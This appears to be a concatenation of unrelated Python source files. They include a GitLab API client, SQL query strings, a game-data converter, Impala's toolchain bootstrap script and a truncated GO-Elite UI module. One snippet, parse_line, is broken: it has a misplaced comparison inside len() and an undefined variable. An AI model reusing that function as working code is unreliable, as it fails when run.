def get_group(self, group):
return self.get('{}/groups/{}'.format(self.base_url, group))
def get_group_members(self, group):
return self.get('{}/groups/{}/members'.format(self.base_url, group))
def get_project_members(self, project):
return self.get('{}/projects/{}/members'.format(self.base_url, project))
def get_current_user(self):
details = self.get('{}/user'.format(self.base_url))
if not details:
return False
username = details['username']
return username
def __add_current_results__(self, all_results, current_results):
if self.args.depth is None:
return {
"combined_results": [*all_results, *current_results],
"continue": True,
}
else:
results = [*all_results, *current_results]
results_count = len(results)
if results_count < self.args.depth:
return {
"combined_results": results,
"continue": True,
}
else:
diff = self.args.depth - results_count
del results[diff:]
return {
"combined_results": results,
"continue": False,
}
def __build_paged_results__(self, response):
all_results = []
result = self.__add_current_results__(all_results, response.json())
all_results += result["combined_results"]
if result["continue"]:
while 'Link' in response.headers and 'rel="next"' in response.headers['Link']:
next_url = re.findall(self.next_page_regex, response.headers['Link'])[0]
response = self.http.get_with_retry_and_paging_adjustment(next_url)
if response.status_code == 200:
result = self.__add_current_results__(all_results, response.json())
all_results = result["combined_results"]
if not result["continue"]:
break
else:
warning("[!] Response %s processing pagination URL: %s", response.status_code, next_url)
return all_results
def get(self, url):
"""
Helper function to interact with GitLab API using python requests
The important things here are:
- Adding the PRIVATE-TOKEN header based on env variable
- interacting with the pagination process via LINK headers
(https://docs.gitlab.com/ee/api/README.html#pagination)
"""
response = self.http.get_with_retry_and_paging_adjustment(url)
if not (response and response.status_code == 200):
error("[!] Response %s received from %s. Skipping.", response.status_code, url)
return False
if 'Link' not in response.headers:
return response.json() if response.headers["Content-Type"] == "application/json" else response.text
return self.__build_paged_results__(response)
|
#!/usr/bin/env python
# -----------------------------------------------------------------------
# user.py
# Author: Sophie Li, Jayson Wu, Connie Xu
# -----------------------------------------------------------------------
class User:
def __init__(self, name, netid, email):
self._name = name
self._netid = netid
self._email = email.lower()
def __str__(self):
name = 'name: ' + self._name
netid = 'netid: ' + self._netid
email = 'email: ' + self._email
info = [name, netid, email]
return '\n'.join(info)
def getName(self):
return self._name
def getNetID(self):
return self._netid
def getEmail(self):
return self._email
|
def parse_line(line):
### Determine syls/stress in all words in line, store other data too.
### Divide the line into word tokens with spaCy.
### Look up each in dictionary, and there or by calculation in the
### Syllabizer determine syllabification and stress. Lay all basic
if len(line) < 1:
return None # nothing to do
elif len(line >=1):
word_tokens = nlp(line)
words_lower = [word.lower() for word in word_tokens]
dictionary_words = [dictionary_lookup(word) for word in word_lower]
calculated_words = [calculate_syllables(word) for word in word_lower]
return [dictionary_words,calculated_words]
line = "Hi there, this is a line of text."
parse_line(line)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
get_nvl_point_list_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
npt.label ILIKE $2::VARCHAR || '%' OR
npt.label ILIKE '%' || $2::VARCHAR || '%' OR
npt.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_point_list_count_query = """
SELECT count(*) AS nvl_point_count
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
npt.label ILIKE $2::VARCHAR || '%' OR
npt.label ILIKE '%' || $2::VARCHAR || '%' OR
npt.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_point_element_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND npt.id = $2::BIGINT
"""
get_nvl_point_element_by_location_id_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND npt.location_id = $2::BIGINT
ORDER BY npt.created_on DESC LIMIT 1
"""
get_nvl_point_list_by_user_id_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.icon AS icon,
loc.location_type_id AS location_type_id,
ltp.name AS location_type,
loc.user_id AS user_id,
loc.name AS location_name,
usr.fullname AS user_fullname,
loc.show_on_map AS show_on_map,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS loc ON loc.id = npt.location_id
LEFT OUTER JOIN public.location_type AS ltp ON ltp.id = loc.location_type_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND loc.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND loc.show_on_map IS TRUE
ORDER BY npt.created_on DESC
""" |
#!/usr/bin/env python
from fabricate import *
import sys
def output_file():
run('cp','input file','output file')
# Hacky, perhaps a bug that can be fixed by fabricate?
for i, x in enumerate(sys.argv):
if x == 'output file':
sys.argv[i] = 'output_file'
main()
|
def convertArmor(armor):
convertedArmor = {}
convertedArmor['id'] = int(armor.get('id'))
convertedArmor['price'] = armor.get('Price')
convertedArmor['part'] = armor.get('Part')
convertedArmor['rarity']= int(armor.get('Rarity'))
convertedArmor['slot'] = int(armor.get('Slot'))
convertedArmor['type'] = armor.get('Type')
convertedArmor['gender'] = armor.get('Gender')
__extractDefense(convertedArmor, armor)
__extractResistances(convertedArmor, armor)
convertedArmor['name'] = armor.get('Name').replace("'","''")
return convertedArmor
def __extractDefense(armorMap, armor):
try:
initial = int(armor.get('Defense').get('initial'))
except:
initial = -1
try:
maximum = int(armor.get('Defense').get('max'))
except:
maximum = -1
armorMap['defense_init'] = initial
armorMap['defense_max'] = maximum
def __extractResistances(armorMap, armor):
armorMap['fire'] = int(armor.get('Fire'))
armorMap['dragon'] = int(armor.get('Dragon'))
armorMap['water'] = int(armor.get('Water'))
armorMap['thunder'] = int(armor.get('Thunder'))
armorMap['ice'] = int(armor.get('Ice'))
def convertSkills(armor):
skillsList = []
for skill in armor.get('Skills'):
skillmap = {}
skillmap['id'] = int(armor.get('id'))
skillmap['skill_id'] = int(skill.get('id'))
skillmap['name'] = skill.get('Name').replace("'", "''")
skillmap['value'] = int(skill.get('Value'))
skillsList.append(skillmap)
return skillsList
def convertCrafting(armor):
craftingList = []
for item in armor.get('Crafting Items'):
craftmap = {}
craftmap['id'] = int(armor.get('id'))
craftmap['item_id'] = int(item.get('id'))
craftmap['name'] = item.get('Name').replace("'", "''")
craftmap['quantity'] = int(item.get('Quantity'))
craftingList.append(craftmap)
return craftingList |
#!/usr/bin/env impala-python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# The purpose of this script is to download prebuilt binaries and jar files to satisfy the
# third-party dependencies for Impala. The script checks for the presence of IMPALA_HOME
# and IMPALA_TOOLCHAIN. IMPALA_HOME indicates that the environment is correctly setup and
# that we can deduce the version settings of the dependencies from the environment.
# IMPALA_TOOLCHAIN indicates the location where the prebuilt artifacts should be extracted
# to. If DOWNLOAD_CDH_COMPONENTS is set to true, this script will also download and extract
# the CDH components (i.e. Hadoop, Hive, HBase and Sentry) into
# CDH_COMPONENTS_HOME.
#
# By default, packages are downloaded from an S3 bucket named native-toolchain.
# The exact URL is based on IMPALA_<PACKAGE>_VERSION environment variables
# (configured in impala-config.sh) as well as the OS version being built on.
# The URL can be overridden with an IMPALA_<PACKAGE>_URL environment variable
# set in impala-config-{local,branch}.sh.
#
# The script is called as follows without any additional parameters:
#
# python bootstrap_toolchain.py
import logging
import os
import random
import re
import sh
import shutil
import subprocess
import sys
import tempfile
import time
HOST = "https://native-toolchain.s3.amazonaws.com/build"
OS_MAPPING = {
"centos6" : "ec2-package-centos-6",
"centos5" : "ec2-package-centos-5",
"centos7" : "ec2-package-centos-7",
"redhatenterpriseserver5" : "ec2-package-centos-5",
"redhatenterpriseserver6" : "ec2-package-centos-6",
"redhatenterpriseserver7" : "ec2-package-centos-7",
"debian6" : "ec2-package-debian-6",
"debian7" : "ec2-package-debian-7",
"debian8" : "ec2-package-debian-8",
"suselinux11": "ec2-package-sles-11",
"suselinux12": "ec2-package-sles-12",
"suse12.2": "ec2-package-sles-12",
"ubuntu12.04" : "ec2-package-ubuntu-12-04",
"ubuntu14.04" : "ec2-package-ubuntu-14-04",
"ubuntu15.04" : "ec2-package-ubuntu-14-04",
"ubuntu15.10" : "ec2-package-ubuntu-14-04",
"ubuntu16.04" : "ec2-package-ubuntu-16-04",
}
class Package(object):
"""
Represents a package to be downloaded. A version, if not specified
explicitly, is retrieved from the environment variable IMPALA_<NAME>_VERSION.
URLs are retrieved from IMPALA_<NAME>_URL, but are optional.
"""
def __init__(self, name, version=None, url=None):
self.name = name
self.version = version
self.url = url
package_env_name = name.replace("-", "_").upper()
if self.version is None:
version_env_var = "IMPALA_{0}_VERSION".format(package_env_name)
self.version = os.environ.get(version_env_var)
if not self.version:
raise Exception("Could not find version for {0} in environment var {1}".format(
name, version_env_var))
if self.url is None:
url_env_var = "IMPALA_{0}_URL".format(package_env_name)
self.url = os.environ.get(url_env_var)
def try_get_platform_release_label():
"""Gets the right package label from the OS version. Return None if not found."""
try:
return get_platform_release_label()
except:
return None
# Cache "lsb_release -irs" to avoid excessive logging from sh, and
# to shave a little bit of time.
lsb_release_cache = None
def get_platform_release_label(release=None):
"""Gets the right package label from the OS version. Raise exception if not found.
'release' can be provided to override the underlying OS version.
"""
global lsb_release_cache
if not release:
if lsb_release_cache:
release = lsb_release_cache
else:
release = "".join(map(lambda x: x.lower(), sh.lsb_release("-irs").split()))
# Only need to check against the major release if RHEL or CentOS
for platform in ['centos', 'redhatenterpriseserver']:
if platform in release:
release = release.split('.')[0]
break
lsb_release_cache = release
for k, v in OS_MAPPING.iteritems():
if re.search(k, release):
return v
raise Exception("Could not find package label for OS version: {0}.".format(release))
def wget_and_unpack_package(download_path, file_name, destination, wget_no_clobber):
if not download_path.endswith("/" + file_name):
raise Exception("URL {0} does not match with expected file_name {1}"
.format(download_path, file_name))
NUM_ATTEMPTS = 3
for attempt in range(1, NUM_ATTEMPTS + 1):
logging.info("Downloading {0} to {1}/{2} (attempt {3})".format(
download_path, destination, file_name, attempt))
# --no-clobber avoids downloading the file if a file with the name already exists
try:
sh.wget(download_path, directory_prefix=destination, no_clobber=wget_no_clobber)
break
except Exception, e:
if attempt == NUM_ATTEMPTS:
raise
logging.error("Download failed; retrying after sleep: " + str(e))
time.sleep(10 + random.random() * 5) # Sleep between 10 and 15 seconds.
logging.info("Extracting {0}".format(file_name))
sh.tar(z=True, x=True, f=os.path.join(destination, file_name), directory=destination)
sh.rm(os.path.join(destination, file_name))
def download_package(destination, package, compiler, platform_release=None):
remove_existing_package(destination, package.name, package.version)
toolchain_build_id = os.environ["IMPALA_TOOLCHAIN_BUILD_ID"]
label = get_platform_release_label(release=platform_release)
format_params = {'product': package.name, 'version': package.version,
'compiler': compiler, 'label': label, 'toolchain_build_id': toolchain_build_id}
file_name = "{product}-{version}-{compiler}-{label}.tar.gz".format(**format_params)
format_params['file_name'] = file_name
if package.url is None:
url_path = "/{toolchain_build_id}/{product}/{version}-{compiler}/{file_name}".format(
**format_params)
download_path = HOST + url_path
else:
download_path = package.url
wget_and_unpack_package(download_path, file_name, destination, True)
def bootstrap(toolchain_root, packages):
"""Downloads and unpacks each package in the list `packages` into `toolchain_root` if it
doesn't exist already.
"""
if not try_get_platform_release_label():
check_custom_toolchain(toolchain_root, packages)
return
# Detect the compiler
compiler = "gcc-{0}".format(os.environ["IMPALA_GCC_VERSION"])
def handle_package(p):
if check_for_existing_package(toolchain_root, p.name, p.version, compiler):
return
if p.name != "kudu" or os.environ["KUDU_IS_SUPPORTED"] == "true":
download_package(toolchain_root, p, compiler)
else:
build_kudu_stub(toolchain_root, p.version, compiler)
write_version_file(toolchain_root, p.name, p.version, compiler,
get_platform_release_label())
execute_many(handle_package, packages)
def check_output(cmd_args):
"""Run the command and return the output. Raise an exception if the command returns
a non-zero return code. Similar to subprocess.check_output() which is only provided
in python 2.7.
"""
process = subprocess.Popen(cmd_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = process.communicate()
if process.wait() != 0:
raise Exception("Command with args '%s' failed with exit code %s:\n%s"
% (cmd_args, process.returncode, stdout))
return stdout
def package_directory(toolchain_root, pkg_name, pkg_version):
dir_name = "{0}-{1}".format(pkg_name, pkg_version)
return os.path.join(toolchain_root, dir_name)
def version_file_path(toolchain_root, pkg_name, pkg_version):
return os.path.join(package_directory(toolchain_root, pkg_name, pkg_version),
"toolchain_package_version.txt")
def check_custom_toolchain(toolchain_root, packages):
missing = []
for p in packages:
pkg_dir = package_directory(toolchain_root, p.name, p.version)
if not os.path.isdir(pkg_dir):
missing.append((p, pkg_dir))
if missing:
msg = "The following packages are not in their expected locations.\n"
for p, pkg_dir in missing:
msg += " %s (expected directory %s to exist)\n" % (p, pkg_dir)
msg += "Pre-built toolchain archives not available for your platform.\n"
msg += "Clone and build native toolchain from source using this repository:\n"
msg += " https://github.com/cloudera/native-toolchain\n"
logging.error(msg)
raise Exception("Toolchain bootstrap failed: required packages were missing")
def check_for_existing_package(toolchain_root, pkg_name, pkg_version, compiler):
"""Return true if toolchain_root already contains the package with the correct
version and compiler.
"""
version_file = version_file_path(toolchain_root, pkg_name, pkg_version)
if not os.path.exists(version_file):
return False
label = get_platform_release_label()
pkg_version_string = "{0}-{1}-{2}-{3}".format(pkg_name, pkg_version, compiler, label)
with open(version_file) as f:
return f.read().strip() == pkg_version_string
def write_version_file(toolchain_root, pkg_name, pkg_version, compiler, label):
with open(version_file_path(toolchain_root, pkg_name, pkg_version), 'w') as f:
f.write("{0}-{1}-{2}-{3}".format(pkg_name, pkg_version, compiler, label))
def remove_existing_package(toolchain_root, pkg_name, pkg_version):
dir_path = package_directory(toolchain_root, pkg_name, pkg_version)
if os.path.exists(dir_path):
logging.info("Removing existing package directory {0}".format(dir_path))
shutil.rmtree(dir_path)
def build_kudu_stub(toolchain_root, kudu_version, compiler):
# When Kudu isn't supported, the CentOS 7 package will be downloaded and the client
# lib will be replaced with a stubbed client.
download_package(toolchain_root, Package("kudu", kudu_version), compiler,
platform_release="centos7")
# Find the client lib files in the extracted dir. There may be several files with
# various extensions. Also there will be a debug version.
kudu_dir = package_directory(toolchain_root, "kudu", kudu_version)
client_lib_paths = []
for path, _, files in os.walk(kudu_dir):
for file in files:
if not file.startswith("libkudu_client.so"):
continue
file_path = os.path.join(path, file)
if os.path.islink(file_path):
continue
client_lib_paths.append(file_path)
if not client_lib_paths:
raise Exception("Unable to find Kudu client lib under '%s'" % kudu_dir)
# The client stub will be create by inspecting a real client and extracting the
# symbols. The choice of which client file to use shouldn't matter.
client_lib_path = client_lib_paths[0]
# Use a newer version of binutils because on older systems the default binutils may
# not be able to read the newer binary.
binutils_dir = package_directory(
toolchain_root, "binutils", os.environ["IMPALA_BINUTILS_VERSION"])
nm_path = os.path.join(binutils_dir, "bin", "nm")
objdump_path = os.path.join(binutils_dir, "bin", "objdump")
# Extract the symbols and write the stubbed client source. There is a special method
# kudu::client::GetShortVersionString() that is overridden so that the stub can be
# identified by the caller.
get_short_version_sig = "kudu::client::GetShortVersionString()"
nm_out = check_output([nm_path, "--defined-only", "-D", client_lib_path])
stub_build_dir = tempfile.mkdtemp()
stub_client_src_file = open(os.path.join(stub_build_dir, "kudu_client.cc"), "w")
try:
stub_client_src_file.write("""
#include <string>
static const std::string kFakeKuduVersion = "__IMPALA_KUDU_STUB__";
static void KuduNotSupported() {
*((char*)0) = 0;
}
namespace kudu { namespace client {
std::string GetShortVersionString() { return kFakeKuduVersion; }
}}
""")
found_start_version_symbol = False
cpp_filt_path = os.path.join(binutils_dir, "bin", "c++filt")
for line in nm_out.splitlines():
addr, sym_type, mangled_name = line.split(" ")
# Skip special functions an anything that isn't a strong symbol. Any symbols that
# get passed this check must be related to Kudu. If a symbol unrelated to Kudu
# (ex: a boost symbol) gets defined in the stub, there's a chance the symbol could
# get used and crash Impala.
if mangled_name in ["_init", "_fini"] or sym_type not in "Tt":
continue
demangled_name = check_output([cpp_filt_path, mangled_name]).strip()
assert "kudu" in demangled_name, \
"Symbol doesn't appear to be related to Kudu: " + demangled_name
if demangled_name == get_short_version_sig:
found_start_version_symbol = True
continue
stub_client_src_file.write("""
extern "C" void %s() {
KuduNotSupported();
}
""" % mangled_name)
if not found_start_version_symbol:
raise Exception("Expected to find symbol a corresponding to"
" %s but it was not found." % get_short_version_sig)
stub_client_src_file.flush()
# The soname is needed to avoid problem in packaging builds. Without the soname,
# the library dependency as listed in the impalad binary will be a full path instead
# of a short name. Debian in particular has problems with packaging when that happens.
objdump_out = check_output([objdump_path, "-p", client_lib_path])
for line in objdump_out.splitlines():
if "SONAME" not in line:
continue
# The line that needs to be parsed should be something like:
# " SONAME libkudu_client.so.0"
so_name = line.split()[1]
break
else:
raise Exception("Unable to extract soname from %s" % client_lib_path)
# Compile the library.
stub_client_lib_path = os.path.join(stub_build_dir, "libkudu_client.so")
subprocess.check_call(["g++", stub_client_src_file.name, "-shared", "-fPIC",
"-Wl,-soname,%s" % so_name, "-o", stub_client_lib_path])
# Replace the real libs with the stub.
for client_lib_path in client_lib_paths:
shutil.copyfile(stub_client_lib_path, client_lib_path)
finally:
shutil.rmtree(stub_build_dir)
def execute_many(f, args):
"""
Executes f(a) for a in args. If possible, uses a threadpool
to execute in parallel. The pool uses the number of CPUs
in the system as the default size.
"""
pool = None
try:
import multiprocessing.pool
pool = multiprocessing.pool.ThreadPool(processes=min(multiprocessing.cpu_count(), 4))
return pool.map(f, args, 1)
except ImportError:
# multiprocessing was introduced in Python 2.6.
# For older Pythons (CentOS 5), degrade to single-threaded execution:
return [ f(a) for a in args ]
def download_cdh_components(toolchain_root, cdh_components):
"""Downloads and unpacks the CDH components into $CDH_COMPONENTS_HOME if not found."""
cdh_components_home = os.environ.get("CDH_COMPONENTS_HOME")
if not cdh_components_home:
logging.error("Impala environment not set up correctly, make sure "
"$CDH_COMPONENTS_HOME is present.")
sys.exit(1)
# Create the directory where CDH components live if necessary.
if not os.path.exists(cdh_components_home):
os.makedirs(cdh_components_home)
# The URL prefix of where CDH components live in S3.
download_path_prefix = HOST + "/cdh_components/"
def download(component):
pkg_directory = package_directory(cdh_components_home, component.name,
component.version)
if os.path.isdir(pkg_directory):
return
# Download the package if it doesn't exist
file_name = "{0}-{1}.tar.gz".format(component.name, component.version)
if component.url is None:
download_path = download_path_prefix + file_name
else:
download_path = component.url
wget_and_unpack_package(download_path, file_name, cdh_components_home, False)
execute_many(download, cdh_components)
if __name__ == "__main__":
"""Validates the presence of $IMPALA_HOME and $IMPALA_TOOLCHAIN in the environment.-
By checking $IMPALA_HOME is present, we assume that IMPALA_{LIB}_VERSION will be present
as well. Will create the directory specified by $IMPALA_TOOLCHAIN if it doesn't exist
yet. Each of the packages specified in `packages` is downloaded and extracted into
$IMPALA_TOOLCHAIN. If $DOWNLOAD_CDH_COMPONENTS is true, this function will also download
the CDH components (i.e. hadoop, hbase, hive, llama, llama-minikidc and sentry) into the
directory specified by $CDH_COMPONENTS_HOME.
"""
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(threadName)s %(levelname)s: %(message)s')
# 'sh' module logs at every execution, which is too noisy
logging.getLogger("sh").setLevel(logging.WARNING)
if not os.environ.get("IMPALA_HOME"):
logging.error("Impala environment not set up correctly, make sure "
"impala-config.sh is sourced.")
sys.exit(1)
# Create the destination directory if necessary
toolchain_root = os.environ.get("IMPALA_TOOLCHAIN")
if not toolchain_root:
logging.error("Impala environment not set up correctly, make sure "
"$IMPALA_TOOLCHAIN is present.")
sys.exit(1)
if not os.path.exists(toolchain_root):
os.makedirs(toolchain_root)
# LLVM and Kudu are the largest packages. Sort them first so that
# their download starts as soon as possible.
packages = map(Package, ["llvm", "kudu",
"avro", "binutils", "boost", "breakpad", "bzip2", "cmake", "crcutil",
"flatbuffers", "gcc", "gflags", "glog", "gperftools", "gtest", "libev",
"lz4", "openldap", "openssl", "protobuf",
"rapidjson", "re2", "snappy", "thrift", "tpc-h", "tpc-ds", "zlib"])
packages.insert(0, Package("llvm", "3.9.1-asserts"))
bootstrap(toolchain_root, packages)
# Download the CDH components if necessary.
if os.getenv("DOWNLOAD_CDH_COMPONENTS", "false") == "true":
cdh_components = map(Package, ["hadoop", "hbase", "hive", "llama-minikdc", "sentry"])
download_cdh_components(toolchain_root, cdh_components)
|
print('hello github!i\"m coming!') |
###UI
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""This module contains fairly generic routines for reading in user interface (UI) instructions from
an existing configuration options file (options.txt), buiding those interfaces, downloading and/or
processing files."""
import math
import statistics
import sys, string
import os.path, platform
import time
import webbrowser
import shutil
import update; reload(update)
import BuildAffymetrixAssociations; reload(BuildAffymetrixAssociations)
import gene_associations; reload(gene_associations)
import export
import unique
import OBO_import
import datetime
import traceback
try:
import WikiPathways_webservice
except Exception:
print 'WikiPathways visualization not supported (requires installation of suds)'
try:
from PIL import Image as PIL_Image
import ImageTk
except Exception:
print 'Python Imaging Library not installed... using default PNG viewer'
from sys import argv
try:
import Tkinter
from Tkinter import *
import PmwFreeze
from Tkconstants import LEFT
import tkMessageBox
import tkFileDialog
except ImportError: print "\nPmw or Tkinter not found... proceeding with manual input"
mac_print_mode = 'no'
if os.name == 'posix': mac_print_mode = 'yes' #os.name is 'posix', 'nt', 'os2', 'mac', 'ce' or 'riscos'
debug_mode = 'no'
def filepath(filename):
fn = unique.filepath(filename)
return fn
def osfilepath(filename):
fn = filepath(filename)
fn = string.replace(fn,'\\','/')
return fn
def read_directory(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Code to prevent folder names from being included
for entry in dir_list:
if entry[-4:] == ".txt" or entry[-4:] == ".csv" or ".zip" in entry or '.obo' in entry or '.ontology' in entry: dir_list2.append(entry)
return dir_list2
def readDirText(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Code to prevent folder names from being included
for entry in dir_list:
if entry[-4:] == ".txt": dir_list2.append(entry)
return dir_list2
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if entry[-4:] != ".txt" and entry[-4:] != ".csv" and ".zip" not in entry: dir_list2.append(entry)
return dir_list2
def returnDirectoriesNoReplace(dir):
dir_list = unique.returnDirectoriesNoReplace(dir); dir_list2 = []
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def returnFilesNoReplace(dir):
dir_list = unique.returnDirectoriesNoReplace(dir); dir_list2 = []
for entry in dir_list:
if '.' in entry: dir_list2.append(entry)
return dir_list2
def cleanUpLine(line):
line = string.replace(line,'\n','')
line = string.replace(line,'\c','')
data = string.replace(line,'\r','')
data = string.replace(data,'"','')
return data
################# GUI #################
def wait(seconds):
### stalls the analysis for the designated number of seconds (allows time to print something to the GUI)
start_time = time.time()
diff = 0
while diff<seconds:
diff = time.time()-start_time
class GUI:
def ViewWikiPathways(self):
""" Canvas is already drawn at this point from __init__ """
global pathway_db
pathway_db={}
button_text = 'Help'
### Create a species drop-down option that can be updated
current_species_names = getSpeciesList()
self.title = 'Select species to search for WikiPathways '
self.option = 'species_wp'
self.options = ['---']+current_species_names #species_list
self.default_option = 0
self.dropDown()
### Create a label that can be updated below the dropdown menu
self.label_name = StringVar()
self.label_name.set('Pathway species list may take several seconds to load')
self.invokeLabel() ### Invoke a new label indicating that the database is loading
### Create a MOD selection drop-down list
null,system_list,mod_list = importSystemInfo()
self.title = 'Select the ID system to translate to (MOD)'
self.option = 'mod_wp'
self.options = mod_list
try: self.default_option = mod_list.index('Ensembl') ### Get the Ensembl index number
except Exception: self.default_option = 0
self.dropDown()
### Create a file selection option
self.title = 'Select GO-Elite input ID text file'
self.notes = 'note: ID file must have a header row and at least three columns:\n'
self.notes += '(1) Identifier, (2) System Code, (3) Value to map (- OR +)\n'
self.file_option = 'goelite_input_file'
self.directory_type = 'file'
self.FileSelectionMenu()
dispaly_pathway = Button(text = 'Display Pathway', command = self.displayPathway)
dispaly_pathway.pack(side = 'right', padx = 10, pady = 10)
back_button = Button(self._parent, text="Back", command=self.goBack)
back_button.pack(side = 'right', padx =10, pady = 5)
quit_win = Button(self._parent, text="Quit", command=self.quit)
quit_win.pack(side = 'right', padx =10, pady = 5)
try: help_button = Button(self._parent, text=button_text, command=self.GetHelpTopLevel); help_button.pack(side = 'left', padx = 5, pady = 5)
except Exception: help_button = Button(self._parent, text=button_text, command=self.linkout); help_button.pack(side = 'left', padx = 5, pady = 5)
self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
self._parent.mainloop()
def FileSelectionMenu(self):
option = self.file_option
group = PmwFreeze.Group(self.parent_type,tag_text = self.title)
group.pack(fill = 'both', expand = 1, padx = 10, pady = 2)
def filecallback(callback=self.callback,option=option): self.getPath(option)
default_option=''
entrytxt = StringVar(); #self.entrytxt.set(self.default_dir)
entrytxt.set(default_option)
self.pathdb[option] = entrytxt
self._user_variables[option] = default_option
entry = Entry(group.interior(),textvariable=self.pathdb[option]);
entry.pack(side='left',fill = 'both', expand = 0.7, padx = 10, pady = 2)
button = Button(group.interior(), text="select "+self.directory_type, width = 10, fg="red", command=filecallback)
button.pack(side=LEFT, padx = 2,pady = 2)
if len(self.notes)>0: ln = Label(self.parent_type, text=self.notes,fg="blue"); ln.pack(padx = 10)
def dropDown(self):
def comp_callback(tag,callback=self.callbackWP,option=self.option):
callback(tag,option)
self.comp = PmwFreeze.OptionMenu(self.parent_type,
labelpos = 'w', label_text = self.title, items = self.options, command = comp_callback)
if self.option == 'wp_id_selection':
self.wp_dropdown = self.comp ### update this variable later (optional)
self.comp.pack(anchor = 'w', padx = 10, pady = 0)
self.comp.invoke(self.default_option) ###Just pick the first option
def comboBox(self):
""" Alternative, more sophisticated UI than dropDown (OptionMenu).
Although it behaves similiar it requires different parameters, can not be
as easily updated with new lists (different method) and requires explict
invokation of callback when a default is set rather than selected. """
def comp_callback(tag,callback=self.callbackWP,option=self.option):
callback(tag,option)
self.comp = PmwFreeze.ComboBox(self.parent_type,
labelpos = 'w', dropdown=1, label_text = self.title,
unique = 0, history = 0,
scrolledlist_items = self.options, selectioncommand = comp_callback)
try: self.comp.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.comp.invoke())
except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
if self.option == 'wp_id_selection':
self.wp_dropdown = self.comp ### update this variable later (optional)
self.comp.pack(anchor = 'w', padx = 10, pady = 0)
self.comp.selectitem(self.default_option) ###Just pick the first option
self.callbackWP(self.options[0],self.option) ### Explicitly, invoke first option (not automatic)
def invokeLabel(self):
self.label_object = Label(self.parent_type, textvariable=self.label_name,fg="blue"); self.label_object.pack(padx = 10)
def invokeStatusLabel(self):
self.label_object = Label(self.parent_type, textvariable=self.label_status_name,fg="blue"); self.label_object.pack(padx = 10)
def enterMenu(self):
if len(self.notes)>0:
